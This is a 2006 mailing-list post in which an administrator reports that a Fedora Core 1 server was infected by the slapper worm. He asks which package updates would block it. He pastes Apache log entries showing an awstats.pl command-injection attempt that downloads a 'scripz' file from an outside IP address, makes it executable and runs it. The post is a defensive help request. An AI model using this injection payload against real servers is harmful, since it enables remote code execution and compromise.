[Date Prev][Date Next] [Thread Prev][Thread Next]
[Thread Index]
[Date Index]
[Author Index]
slapper worm
- From: "Michael Mansour" <mic npgx com au>
- To: "Fedora Legacy" <fedora-legacy-list redhat com>
- Subject: slapper worm
- Date: Tue, 24 Jan 2006 06:32:29 +1000
Hi guys,
I have an FC1 machine which got infected twice with the slapper worm, and then
started DOS attacking a large vendor.
I've stopped slapper in its tracks with a couple of changes to FC1, but in
analysing now how it got in (it seems to use SSLv2 vulerabilities in an apache
SSL server which I've now turned off), I see the following bit of interest in
my apache access_log:
220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
HTTP/1.1"
403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
HTTP/1.1"
404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
These "scripz" files end up going into /tmp, being compiled with gcc, renamed
to "httpd" and run as that.
I'm using:
perl-5.8.3-17.4.legacy
httpd-2.0.51-1.9.legacy
openssl-0.9.7a-33.13.legacy
Are there any updates FL can do to any of the packages to fix/block slapper
from an FC1 machine?
Michael.
[Date Prev][Date Next] [Thread Prev][Thread Next]
[Thread Index]
[Date Index]
[Author Index]